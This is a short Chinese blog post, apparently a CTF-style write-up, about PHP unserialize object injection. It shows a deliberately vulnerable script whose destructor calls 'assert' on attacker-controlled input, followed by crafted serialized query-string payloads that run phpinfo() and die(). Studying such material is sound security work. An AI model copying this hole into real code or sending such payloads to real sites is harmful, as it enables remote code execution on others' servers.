<?php
// +----------------------------------------------------------------------
// | Copyright (c) 2006-2012 KingBin All rights reserved.
// +----------------------------------------------------------------------
// | Licensed ( http://www.apache.org/licenses/LICENSE-2.0 )
// +----------------------------------------------------------------------
// | Author: KingBin 1055692563@qq.com
// +----------------------------------------------------------------------
error_reporting(0);
class test
{
public $fn=array('a','s','s','e','r','t');
public $str; function __destruct()
{
$r = join(null,$this->fn);
return $r($this->str);
}
} if($_GET['url']) unserialize($_GET['url']) && die(); show_source(__FILE__); ?>

所以 只要我们提交一个
$o=new test; $o->str='phpinfo()'; 那么是不是就会起到执行phpinfo呢? 所以转换一下  xx.php?url=O:4:"test":1:{s:3:"str";s:9:"phpinfo()";} 就会执行了  这个类~~~~

?url=O:4:%22test%22:2:{s:2:%22fn%22;a:6:{i:0;s:1:%22a%22;i:1;s:1:%22s%22;i:2;s:1:%22s%22;i:3;s:1:%22e%22;i:4;s:1:%22r%22;i:5;s:1:%22t%22;}s:3:%22str%22;s:18:%22die('heelo%20world')%22;}

最新文章

  1. python之最强王者(1)——python入门简介
  2. oracle中的使用总结一
  3. Unity上一页下一页切换功能实现源码(仅供参考)
  4. linux之LVM
  5. wampserver中Apache启动不了的问题
  6. vim 空格 制表符
  7. 调试X Server
  8. Eclipse去除JavaScript验证错误
  9. C++_Eigen函数库用法笔记——Advanced Initialization
  10. [ACDream 1430]SETI 后缀数组
  11. Codeforces 475D CGCDSSQ(分治)
  12. hdu 3111 DLX解数独
  13. VS2013 右键监视,未能计算表达式的值
  14. 排序算法ONE:选择排序SelectSort
  15. rsync数据同步配置
  16. Python+Flask搭建mock api server
  17. promise之我见
  18. C#判断日期是否合法
  19. 【转载】MSXML应用总结 开发篇(下)
  20. HTTP请求方式及状态码

热门文章

  1. 一个n*n 的方格,要从左上角走到右下角,一次只能往右或往下走一步,求算法得出所有走动的方法数。
  2. UVA-820 Internet Bandwidth (最大流)
  3. 001——数组(一)数组知识及foreach函数应用
  4. maven中jar、war、pom的区别
  5. NodeJS反序列化漏洞利用
  6. 第十课 C++异常简介
  7. scikit-learn 学习笔记-- Generalized Linear Models (二)
  8. spring注解事务使用总结
  9. 【Python】matplotlib 双y轴绘制及合并图例
  10. StreamSets 部署 Pipelines 到 SDC Edge